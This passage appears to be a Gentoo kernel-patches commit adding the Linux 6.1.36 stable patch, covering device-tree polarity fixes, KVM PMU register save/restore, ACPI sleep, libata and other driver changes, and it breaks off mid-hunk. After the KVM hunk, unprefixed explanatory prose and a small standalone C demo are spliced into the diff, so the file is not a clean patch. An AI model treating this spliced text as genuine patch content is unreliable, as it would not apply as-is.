+Desc:   Linux 6.1.36
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1035_linux-6.1.36.patch b/1035_linux-6.1.36.patch
new file mode 100644
index 00000000..1e6d88ca
--- /dev/null
+++ b/1035_linux-6.1.36.patch
@@ -0,0 +1,231726 @@
+diff --git a/MAINTAINERS b/MAINTAINERS
+index 301b9ba6af79f..379387e20a96d 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -5183,8 +5183,8 @@ S:	Supported
+ W:	https://wiki.samba.org/index.php/LinuxCIFS
+ T:	git git://git.samba.org/sfrench/cifs-2.6.git
+ F:	Documentation/admin-guide/cifs/
+-F:	fs/cifs/
+-F:	fs/smbfs_common/
++F:	fs/smb/client/
++F:	fs/smb/common/
+ F:	include/uapi/linux/cifs
+ 
+ COMPACTPCI HOTPLUG CORE
+@@ -11168,8 +11168,8 @@ L:	linux-cifs@vger.kernel.org
+ S:	Maintained
+ T:	git git://git.samba.org/ksmbd.git
+ F:	Documentation/filesystems/cifs/ksmbd.rst
+-F:	fs/ksmbd/
+-F:	fs/smbfs_common/
++F:	fs/smb/common/
++F:	fs/smb/server/
+ 
+ KERNEL UNIT TESTING FRAMEWORK (KUnit)
+ M:	Brendan Higgins <brendanhiggins@google.com>
+diff --git a/Makefile b/Makefile
+index 46c06af912d9d..cffb83d7a0fb6 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 35
++SUBLEVEL = 36
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/am57xx-cl-som-am57x.dts b/arch/arm/boot/dts/am57xx-cl-som-am57x.dts
+index 2fc9a5d5e0c0d..625b9b311b49d 100644
+--- a/arch/arm/boot/dts/am57xx-cl-som-am57x.dts
++++ b/arch/arm/boot/dts/am57xx-cl-som-am57x.dts
+@@ -527,7 +527,7 @@
+ 
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <31 0>;
+-		pendown-gpio = <&gpio1 31 0>;
++		pendown-gpio = <&gpio1 31 GPIO_ACTIVE_LOW>;
+ 
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+diff --git a/arch/arm/boot/dts/at91sam9261ek.dts b/arch/arm/boot/dts/at91sam9261ek.dts
+index 88869ca874d1a..045cb253f23a6 100644
+--- a/arch/arm/boot/dts/at91sam9261ek.dts
++++ b/arch/arm/boot/dts/at91sam9261ek.dts
+@@ -156,7 +156,7 @@
+ 					compatible = "ti,ads7843";
+ 					interrupts-extended = <&pioC 2 IRQ_TYPE_EDGE_BOTH>;
+ 					spi-max-frequency = <3000000>;
+-					pendown-gpio = <&pioC 2 GPIO_ACTIVE_HIGH>;
++					pendown-gpio = <&pioC 2 GPIO_ACTIVE_LOW>;
+ 
+ 					ti,x-min = /bits/ 16 <150>;
+ 					ti,x-max = /bits/ 16 <3830>;
+diff --git a/arch/arm/boot/dts/imx7d-pico-hobbit.dts b/arch/arm/boot/dts/imx7d-pico-hobbit.dts
+index d917dc4f2f227..6ad39dca70096 100644
+--- a/arch/arm/boot/dts/imx7d-pico-hobbit.dts
++++ b/arch/arm/boot/dts/imx7d-pico-hobbit.dts
+@@ -64,7 +64,7 @@
+ 		interrupt-parent = <&gpio2>;
+ 		interrupts = <7 0>;
+ 		spi-max-frequency = <1000000>;
+-		pendown-gpio = <&gpio2 7 0>;
++		pendown-gpio = <&gpio2 7 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&reg_3p3v>;
+ 		ti,x-min = /bits/ 16 <0>;
+ 		ti,x-max = /bits/ 16 <4095>;
+diff --git a/arch/arm/boot/dts/imx7d-sdb.dts b/arch/arm/boot/dts/imx7d-sdb.dts
+index f483bc0afe5ea..234e5fc647b22 100644
+--- a/arch/arm/boot/dts/imx7d-sdb.dts
++++ b/arch/arm/boot/dts/imx7d-sdb.dts
+@@ -205,7 +205,7 @@
+ 		pinctrl-0 = <&pinctrl_tsc2046_pendown>;
+ 		interrupt-parent = <&gpio2>;
+ 		interrupts = <29 0>;
+-		pendown-gpio = <&gpio2 29 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio2 29 GPIO_ACTIVE_LOW>;
+ 		touchscreen-max-pressure = <255>;
+ 		wakeup-source;
+ 	};
+diff --git a/arch/arm/boot/dts/omap3-cm-t3x.dtsi b/arch/arm/boot/dts/omap3-cm-t3x.dtsi
+index e61b8a2bfb7de..51baedf1603bd 100644
+--- a/arch/arm/boot/dts/omap3-cm-t3x.dtsi
++++ b/arch/arm/boot/dts/omap3-cm-t3x.dtsi
+@@ -227,7 +227,7 @@
+ 
+ 		interrupt-parent = <&gpio2>;
+ 		interrupts = <25 0>;		/* gpio_57 */
+-		pendown-gpio = <&gpio2 25 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio2 25 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi b/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi
+index 3decc2d78a6ca..a7f99ae0c1fe9 100644
+--- a/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi
++++ b/arch/arm/boot/dts/omap3-devkit8000-lcd-common.dtsi
+@@ -54,7 +54,7 @@
+ 
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <27 0>;		/* gpio_27 */
+-		pendown-gpio = <&gpio1 27 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio1 27 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-lilly-a83x.dtsi b/arch/arm/boot/dts/omap3-lilly-a83x.dtsi
+index c595afe4181d7..d310b5c7bac36 100644
+--- a/arch/arm/boot/dts/omap3-lilly-a83x.dtsi
++++ b/arch/arm/boot/dts/omap3-lilly-a83x.dtsi
+@@ -311,7 +311,7 @@
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <8 0>;   /* boot6 / gpio_8 */
+ 		spi-max-frequency = <1000000>;
+-		pendown-gpio = <&gpio1 8 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio1 8 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&reg_vcc3>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&tsc2048_pins>;
+diff --git a/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi b/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi
+index 1d6e88f99eb31..c3570acc35fad 100644
+--- a/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi
++++ b/arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi
+@@ -149,7 +149,7 @@
+ 
+ 		interrupt-parent = <&gpio4>;
+ 		interrupts = <18 0>;			/* gpio_114 */
+-		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi b/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi
+index 7e30f9d45790e..d95a0e130058c 100644
+--- a/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi
++++ b/arch/arm/boot/dts/omap3-overo-common-lcd43.dtsi
+@@ -160,7 +160,7 @@
+ 
+ 		interrupt-parent = <&gpio4>;
+ 		interrupts = <18 0>;			/* gpio_114 */
+-		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio4 18 GPIO_ACTIVE_LOW>;
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+ 		ti,x-max = /bits/ 16 <0x0fff>;
+diff --git a/arch/arm/boot/dts/omap3-pandora-common.dtsi b/arch/arm/boot/dts/omap3-pandora-common.dtsi
+index 559853764487f..4c3b6bab179cc 100644
+--- a/arch/arm/boot/dts/omap3-pandora-common.dtsi
++++ b/arch/arm/boot/dts/omap3-pandora-common.dtsi
+@@ -651,7 +651,7 @@
+ 		pinctrl-0 = <&penirq_pins>;
+ 		interrupt-parent = <&gpio3>;
+ 		interrupts = <30 IRQ_TYPE_NONE>;	/* GPIO_94 */
+-		pendown-gpio = <&gpio3 30 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio3 30 GPIO_ACTIVE_LOW>;
+ 		vcc-supply = <&vaux4>;
+ 
+ 		ti,x-min = /bits/ 16 <0>;
+diff --git a/arch/arm/boot/dts/omap5-cm-t54.dts b/arch/arm/boot/dts/omap5-cm-t54.dts
+index ca759b7b8a580..e62ea8b6d53fd 100644
+--- a/arch/arm/boot/dts/omap5-cm-t54.dts
++++ b/arch/arm/boot/dts/omap5-cm-t54.dts
+@@ -354,7 +354,7 @@
+ 
+ 		interrupt-parent = <&gpio1>;
+ 		interrupts = <15 0>;			/* gpio1_wk15 */
+-		pendown-gpio = <&gpio1 15 GPIO_ACTIVE_HIGH>;
++		pendown-gpio = <&gpio1 15 GPIO_ACTIVE_LOW>;
+ 
+ 
+ 		ti,x-min = /bits/ 16 <0x0>;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+index ca50f0ba9b815..1c370dcfe60b9 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-idp.dtsi
+@@ -488,7 +488,6 @@
+ 	wcd_rx: codec@0,4 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 4>;
+-		#sound-dai-cells = <1>;
+ 		qcom,rx-port-mapping = <1 2 3 4 5>;
+ 	};
+ };
+@@ -499,7 +498,6 @@
+ 	wcd_tx: codec@0,3 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 3>;
+-		#sound-dai-cells = <1>;
+ 		qcom,tx-port-mapping = <1 2 3 4>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+index f7665b3799233..c358abc052eb8 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280-qcard.dtsi
+@@ -418,7 +418,6 @@
+ 	wcd_rx: codec@0,4 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 4>;
+-		#sound-dai-cells = <1>;
+ 		qcom,rx-port-mapping = <1 2 3 4 5>;
+ 	};
+ };
+@@ -427,7 +426,6 @@
+ 	wcd_tx: codec@0,3 {
+ 		compatible = "sdw20217010d00";
+ 		reg = <0 3>;
+-		#sound-dai-cells = <1>;
+ 		qcom,tx-port-mapping = <1 2 3 4>;
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts b/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts
+index e00568a6be5cc..6ba562b922e6c 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz-cm4.dts
+@@ -28,6 +28,16 @@
+ 		regulator-max-microvolt = <5000000>;
+ 		vin-supply = <&vcc12v_dcin>;
+ 	};
++
++	vcc_sd_pwr: vcc-sd-pwr-regulator {
++		compatible = "regulator-fixed";
++		regulator-name = "vcc_sd_pwr";
++		regulator-always-on;
++		regulator-boot-on;
++		regulator-min-microvolt = <3300000>;
++		regulator-max-microvolt = <3300000>;
++		vin-supply = <&vcc3v3_sys>;
++	};
+ };
+ 
+ &gmac1 {
+@@ -119,13 +129,7 @@
+ };
+ 
+ &sdmmc0 {
+-	vmmc-supply = <&sdmmc_pwr>;
+-	status = "okay";
+-};
+-
+-&sdmmc_pwr {
+-	regulator-min-microvolt = <3300000>;
+-	regulator-max-microvolt = <3300000>;
++	vmmc-supply = <&vcc_sd_pwr>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+index 4d494b53a71ab..ba56ca2e66c8d 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+@@ -92,16 +92,6 @@
+ 		regulator-max-microvolt = <3300000>;
+ 		vin-supply = <&vcc5v0_sys>;
+ 	};
+-
+-	sdmmc_pwr: sdmmc-pwr-regulator {
+-		compatible = "regulator-fixed";
+-		enable-active-high;
+-		gpio = <&gpio0 RK_PA5 GPIO_ACTIVE_HIGH>;
+-		pinctrl-names = "default";
+-		pinctrl-0 = <&sdmmc_pwr_h>;
+-		regulator-name = "sdmmc_pwr";
+-		status = "disabled";
+-	};
+ };
+ 
+ &cpu0 {
+@@ -143,6 +133,24 @@
+ 	status = "disabled";
+ };
+ 
++&gpio0 {
++	nextrst-hog {
++		gpio-hog;
++		/*
++		 * GPIO_ACTIVE_LOW + output-low here means that the pin is set
++		 * to high, because output-low decides the value pre-inversion.
++		 */
++		gpios = <RK_PA5 GPIO_ACTIVE_LOW>;
++		line-name = "nEXTRST";
++		output-low;
++	};
++};
++
++&gpu {
++	mali-supply = <&vdd_gpu>;
++	status = "okay";
++};
++
+ &i2c0 {
+ 	status = "okay";
+ 
+@@ -480,12 +488,6 @@
+ 			rockchip,pins = <2 RK_PC2 RK_FUNC_GPIO &pcfg_pull_none>;
+ 		};
+ 	};
+-
+-	sdmmc-pwr {
+-		sdmmc_pwr_h: sdmmc-pwr-h {
+-			rockchip,pins = <0 RK_PA5 RK_FUNC_GPIO &pcfg_pull_none>;
+-		};
+-	};
+ };
+ 
+ &pmu_io_domains {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568.dtsi b/arch/arm64/boot/dts/rockchip/rk3568.dtsi
+index ba67b58f05b79..f1be76a54ceb0 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3568.dtsi
+@@ -94,9 +94,10 @@
+ 		power-domains = <&power RK3568_PD_PIPE>;
+ 		reg = <0x3 0xc0400000 0x0 0x00400000>,
+ 		      <0x0 0xfe270000 0x0 0x00010000>,
+-		      <0x3 0x7f000000 0x0 0x01000000>;
+-		ranges = <0x01000000 0x0 0x3ef00000 0x3 0x7ef00000 0x0 0x00100000>,
+-			 <0x02000000 0x0 0x00000000 0x3 0x40000000 0x0 0x3ef00000>;
++		      <0x0 0xf2000000 0x0 0x00100000>;
++		ranges = <0x01000000 0x0 0xf2100000 0x0 0xf2100000 0x0 0x00100000>,
++			 <0x02000000 0x0 0xf2200000 0x0 0xf2200000 0x0 0x01e00000>,
++			 <0x03000000 0x0 0x40000000 0x3 0x40000000 0x0 0x40000000>;
+ 		reg-names = "dbi", "apb", "config";
+ 		resets = <&cru SRST_PCIE30X1_POWERUP>;
+ 		reset-names = "pipe";
+@@ -146,9 +147,10 @@
+ 		power-domains = <&power RK3568_PD_PIPE>;
+ 		reg = <0x3 0xc0800000 0x0 0x00400000>,
+ 		      <0x0 0xfe280000 0x0 0x00010000>,
+-		      <0x3 0xbf000000 0x0 0x01000000>;
+-		ranges = <0x01000000 0x0 0x3ef00000 0x3 0xbef00000 0x0 0x00100000>,
+-			 <0x02000000 0x0 0x00000000 0x3 0x80000000 0x0 0x3ef00000>;
++		      <0x0 0xf0000000 0x0 0x00100000>;
++		ranges = <0x01000000 0x0 0xf0100000 0x0 0xf0100000 0x0 0x00100000>,
++			 <0x02000000 0x0 0xf0200000 0x0 0xf0200000 0x0 0x01e00000>,
++			 <0x03000000 0x0 0x40000000 0x3 0x80000000 0x0 0x40000000>;
+ 		reg-names = "dbi", "apb", "config";
+ 		resets = <&cru SRST_PCIE30X2_POWERUP>;
+ 		reset-names = "pipe";
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 1d423daae971b..234b5bbda1204 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -951,7 +951,7 @@
+ 		compatible = "rockchip,rk3568-pcie";
+ 		reg = <0x3 0xc0000000 0x0 0x00400000>,
+ 		      <0x0 0xfe260000 0x0 0x00010000>,
+-		      <0x3 0x3f000000 0x0 0x01000000>;
++		      <0x0 0xf4000000 0x0 0x00100000>;
+ 		reg-names = "dbi", "apb", "config";
+ 		interrupts = <GIC_SPI 75 IRQ_TYPE_LEVEL_HIGH>,
+ 			     <GIC_SPI 74 IRQ_TYPE_LEVEL_HIGH>,
+@@ -981,8 +981,9 @@
+ 		phys = <&combphy2 PHY_TYPE_PCIE>;
+ 		phy-names = "pcie-phy";
+ 		power-domains = <&power RK3568_PD_PIPE>;
+-		ranges = <0x01000000 0x0 0x3ef00000 0x3 0x3ef00000 0x0 0x00100000
+-			  0x02000000 0x0 0x00000000 0x3 0x00000000 0x0 0x3ef00000>;
++		ranges = <0x01000000 0x0 0xf4100000 0x0 0xf4100000 0x0 0x00100000>,
++			 <0x02000000 0x0 0xf4200000 0x0 0xf4200000 0x0 0x01e00000>,
++			 <0x03000000 0x0 0x40000000 0x3 0x00000000 0x0 0x40000000>;
+ 		resets = <&cru SRST_PCIE20_POWERUP>;
+ 		reset-names = "pipe";
+ 		#address-cells = <3>;
+diff --git a/arch/arm64/include/asm/sysreg.h b/arch/arm64/include/asm/sysreg.h
+index 7d301700d1a93..3a448ab0924b3 100644
+--- a/arch/arm64/include/asm/sysreg.h
++++ b/arch/arm64/include/asm/sysreg.h
+@@ -111,8 +111,14 @@
+ #define SB_BARRIER_INSN			__SYS_BARRIER_INSN(0, 7, 31)
+ 
+ #define SYS_DC_ISW			sys_insn(1, 0, 7, 6, 2)
++#define SYS_DC_IGSW			sys_insn(1, 0, 7, 6, 4)
++#define SYS_DC_IGDSW			sys_insn(1, 0, 7, 6, 6)
+ #define SYS_DC_CSW			sys_insn(1, 0, 7, 10, 2)
++#define SYS_DC_CGSW			sys_insn(1, 0, 7, 10, 4)
++#define SYS_DC_CGDSW			sys_insn(1, 0, 7, 10, 6)
+ #define SYS_DC_CISW			sys_insn(1, 0, 7, 14, 2)
++#define SYS_DC_CIGSW			sys_insn(1, 0, 7, 14, 4)
++#define SYS_DC_CIGDSW			sys_insn(1, 0, 7, 14, 6)
+ 
+ /*
+  * Automatically generated definitions for system registers, the
+diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
+index 2208d79b18dea..081aca8f432ef 100644
+--- a/arch/arm64/kvm/hyp/include/hyp/switch.h
++++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
+@@ -81,7 +81,12 @@ static inline void __activate_traps_common(struct kvm_vcpu *vcpu)
+ 	 * EL1 instead of being trapped to EL2.
+ 	 */
+ 	if (kvm_arm_support_pmu_v3()) {
++		struct kvm_cpu_context *hctxt;
++
+ 		write_sysreg(0, pmselr_el0);
++
++		hctxt = &this_cpu_ptr(&kvm_host_data)->host_ctxt;
++		ctxt_sys_reg(hctxt, PMUSERENR_EL0) = read_sysreg(pmuserenr_el0);
+ 		write_sysreg(ARMV8_PMU_USERENR_MASK, pmuserenr_el0);
+ 	}
+ 
+@@ -105,8 +110,12 @@ static inline void __deactivate_traps_common(struct kvm_vcpu *vcpu)
+ 	write_sysreg(vcpu->arch.mdcr_el2_host, mdcr_el2);
+ 
+ 	write_sysreg(0, hstr_el2);
+-	if (kvm_arm_support_pmu_v3())
+-		write_sysreg(0, pmuserenr_el0);
++	if (kvm_arm_support_pmu_v3()) {
++		struct kvm_cpu_context *hctxt;
++
++		hctxt = &this_cpu_ptr(&kvm_host_data)->host_ctxt;
++		write_sysreg(ctxt_sys_reg(hctxt, PMUSERENR_EL0), pmuserenr_el0);
++	}
+ 
+ 	if (cpus_have_final_cap(ARM64_SME)) {
+ 		sysreg_clear_set_s(SYS_HFGRTR_EL2, 0,
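
The PMUSERENR_EL0 fix follows the standard save/install/restore shape for any register shared between host and guest: stash the host's value in the host context on entry, install the guest-side setting, and write the saved value back on exit instead of a hard-coded 0. Reduced to its essentials with a fake register and invented names:

#include <stdio.h>

static unsigned long fake_sysreg;	/* stands in for pmuserenr_el0 */

struct host_ctxt { unsigned long pmuserenr; };

static void activate_traps(struct host_ctxt *h, unsigned long guest_val)
{
	h->pmuserenr = fake_sysreg;	/* save the host's value first */
	fake_sysreg = guest_val;	/* then install the trap setting */
}

static void deactivate_traps(const struct host_ctxt *h)
{
	fake_sysreg = h->pmuserenr;	/* restore, instead of writing 0 */
}

int main(void)
{
	struct host_ctxt h;

	fake_sysreg = 0xf;		/* host had user access enabled */
	activate_traps(&h, 0x1);
	deactivate_traps(&h);
	printf("restored: %#lx\n", fake_sysreg);	/* 0xf, not 0 */
	return fake_sysreg == 0xf ? 0 : 1;
}
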
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index 37e74ca4dad85..f2f3bf4a04b0b 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -446,6 +446,7 @@ int vgic_lazy_init(struct kvm *kvm)
+ int kvm_vgic_map_resources(struct kvm *kvm)
+ {
+ 	struct vgic_dist *dist = &kvm->arch.vgic;
++	enum vgic_type type;
+ 	gpa_t dist_base;
+ 	int ret = 0;
+ 
+@@ -460,10 +461,13 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	if (!irqchip_in_kernel(kvm))
+ 		goto out;
+ 
+-	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V2)
++	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V2) {
+ 		ret = vgic_v2_map_resources(kvm);
+-	else
++		type = VGIC_V2;
++	} else {
+ 		ret = vgic_v3_map_resources(kvm);
++		type = VGIC_V3;
++	}
+ 
+ 	if (ret) {
+ 		__kvm_vgic_destroy(kvm);
+@@ -473,8 +477,7 @@ int kvm_vgic_map_resources(struct kvm *kvm)
+ 	dist_base = dist->vgic_dist_base;
+ 	mutex_unlock(&kvm->arch.config_lock);
+ 
+-	ret = vgic_register_dist_iodev(kvm, dist_base,
+-				       kvm_vgic_global_state.type);
++	ret = vgic_register_dist_iodev(kvm, dist_base, type);
+ 	if (ret) {
+ 		kvm_err("Unable to register VGIC dist MMIO regions\n");
+ 		kvm_vgic_destroy(kvm);
+diff --git a/arch/s390/purgatory/Makefile b/arch/s390/purgatory/Makefile
+index d237bc6841cb8..4cbf306b8181f 100644
+--- a/arch/s390/purgatory/Makefile
++++ b/arch/s390/purgatory/Makefile
+@@ -26,6 +26,7 @@ KBUILD_CFLAGS += -Wno-pointer-sign -Wno-sign-compare
+ KBUILD_CFLAGS += -fno-zero-initialized-in-bss -fno-builtin -ffreestanding
+ KBUILD_CFLAGS += -c -MD -Os -m64 -msoft-float -fno-common
+ KBUILD_CFLAGS += -fno-stack-protector
++KBUILD_CFLAGS += -DDISABLE_BRANCH_PROFILING
+ KBUILD_CFLAGS += $(CLANG_FLAGS)
+ KBUILD_CFLAGS += $(call cc-option,-fno-PIE)
+ KBUILD_AFLAGS := $(filter-out -DCC_USING_EXPOLINE,$(KBUILD_AFLAGS))
+diff --git a/arch/x86/kernel/apic/x2apic_phys.c b/arch/x86/kernel/apic/x2apic_phys.c
+index 6bde05a86b4ed..896bc41cb2ba7 100644
+--- a/arch/x86/kernel/apic/x2apic_phys.c
++++ b/arch/x86/kernel/apic/x2apic_phys.c
+@@ -97,7 +97,10 @@ static void init_x2apic_ldr(void)
+ 
+ static int x2apic_phys_probe(void)
+ {
+-	if (x2apic_mode && (x2apic_phys || x2apic_fadt_phys()))
++	if (!x2apic_mode)
++		return 0;
++
++	if (x2apic_phys || x2apic_fadt_phys())
+ 		return 1;
+ 
+ 	return apic == &apic_x2apic_phys;
+diff --git a/arch/x86/mm/kaslr.c b/arch/x86/mm/kaslr.c
+index 557f0fe25dff4..37db264866b64 100644
+--- a/arch/x86/mm/kaslr.c
++++ b/arch/x86/mm/kaslr.c
+@@ -172,10 +172,10 @@ void __meminit init_trampoline_kaslr(void)
+ 		set_p4d(p4d_tramp,
+ 			__p4d(_KERNPG_TABLE | __pa(pud_page_tramp)));
+ 
+-		set_pgd(&trampoline_pgd_entry,
+-			__pgd(_KERNPG_TABLE | __pa(p4d_page_tramp)));
++		trampoline_pgd_entry =
++			__pgd(_KERNPG_TABLE | __pa(p4d_page_tramp));
+ 	} else {
+-		set_pgd(&trampoline_pgd_entry,
+-			__pgd(_KERNPG_TABLE | __pa(pud_page_tramp)));
++		trampoline_pgd_entry =
++			__pgd(_KERNPG_TABLE | __pa(pud_page_tramp));
+ 	}
+ }
+diff --git a/arch/x86/net/bpf_jit_comp.c b/arch/x86/net/bpf_jit_comp.c
+index 99620428ad785..db6053a22e866 100644
+--- a/arch/x86/net/bpf_jit_comp.c
++++ b/arch/x86/net/bpf_jit_comp.c
+@@ -2478,7 +2478,7 @@ out_image:
+ 	}
+ 
+ 	if (bpf_jit_enable > 1)
+-		bpf_jit_dump(prog->len, proglen, pass + 1, image);
++		bpf_jit_dump(prog->len, proglen, pass + 1, rw_image);
+ 
+ 	if (image) {
+ 		if (!prog->is_func || extra_pass) {
+diff --git a/drivers/acpi/acpica/achware.h b/drivers/acpi/acpica/achware.h
+index 6f2787506b50c..c1b6e7bf4fcb5 100644
+--- a/drivers/acpi/acpica/achware.h
++++ b/drivers/acpi/acpica/achware.h
+@@ -101,8 +101,6 @@ acpi_status
+ acpi_hw_get_gpe_status(struct acpi_gpe_event_info *gpe_event_info,
+ 		       acpi_event_status *event_status);
+ 
+-acpi_status acpi_hw_disable_all_gpes(void);
+-
+ acpi_status acpi_hw_enable_all_runtime_gpes(void);
+ 
+ acpi_status acpi_hw_enable_all_wakeup_gpes(void);
+diff --git a/drivers/acpi/sleep.c b/drivers/acpi/sleep.c
+index 4ca6672512722..539c12fbd2f14 100644
+--- a/drivers/acpi/sleep.c
++++ b/drivers/acpi/sleep.c
+@@ -636,11 +636,19 @@ static int acpi_suspend_enter(suspend_state_t pm_state)
+ 	}
+ 
+ 	/*
+-	 * Disable and clear GPE status before interrupt is enabled. Some GPEs
+-	 * (like wakeup GPE) haven't handler, this can avoid such GPE misfire.
+-	 * acpi_leave_sleep_state will reenable specific GPEs later
++	 * Disable all GPE and clear their status bits before interrupts are
++	 * enabled. Some GPEs (like wakeup GPEs) have no handlers and this can
++	 * prevent them from producing spurious interrupts.
++	 *
++	 * acpi_leave_sleep_state() will reenable specific GPEs later.
++	 *
++	 * Because this code runs on one CPU with disabled interrupts (all of
++	 * the other CPUs are offline at this time), it need not acquire any
++	 * sleeping locks which may trigger an implicit preemption point even
++	 * if there is no contention, so avoid doing that by using a low-level
++	 * library routine here.
+ 	 */
+-	acpi_disable_all_gpes();
++	acpi_hw_disable_all_gpes();
+ 	/* Allow EC transactions to happen. */
+ 	acpi_ec_unblock_transactions();
+ 
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index a5ea144722fa3..0ba0c3d1613f1 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5313,7 +5313,7 @@ struct ata_port *ata_port_alloc(struct ata_host *host)
+ 
+ 	mutex_init(&ap->scsi_scan_mutex);
+ 	INIT_DELAYED_WORK(&ap->hotplug_task, ata_scsi_hotplug);
+-	INIT_WORK(&ap->scsi_rescan_task, ata_scsi_dev_rescan);
++	INIT_DELAYED_WORK(&ap->scsi_rescan_task, ata_scsi_dev_rescan);
+ 	INIT_LIST_HEAD(&ap->eh_done_q);
+ 	init_waitqueue_head(&ap->eh_wait_q);
+ 	init_completion(&ap->park_req_pending);
+@@ -5919,6 +5919,7 @@ static void ata_port_detach(struct ata_port *ap)
+ 	WARN_ON(!(ap->pflags & ATA_PFLAG_UNLOADED));
+ 
+ 	cancel_delayed_work_sync(&ap->hotplug_task);
++	cancel_delayed_work_sync(&ap->scsi_rescan_task);
+ 
+  skip_eh:
+ 	/* clean up zpodd on port removal */
+diff --git a/drivers/ata/libata-eh.c b/drivers/ata/libata-eh.c
+index 08e11bc312c28..a3ae5fc2a42fc 100644
+--- a/drivers/ata/libata-eh.c
++++ b/drivers/ata/libata-eh.c
+@@ -2973,7 +2973,7 @@ static int ata_eh_revalidate_and_attach(struct ata_link *link,
+ 			ehc->i.flags |= ATA_EHI_SETMODE;
+ 
+ 			/* schedule the scsi_rescan_device() here */
+-			schedule_work(&(ap->scsi_rescan_task));
++			schedule_delayed_work(&ap->scsi_rescan_task, 0);
+ 		} else if (dev->class == ATA_DEV_UNKNOWN &&
+ 			   ehc->tries[dev->devno] &&
+ 			   ata_class_enabled(ehc->classes[dev->devno])) {
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 39e1ff9b686b9..9c0052d28078a 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -4601,10 +4601,11 @@ int ata_scsi_user_scan(struct Scsi_Host *shost, unsigned int channel,
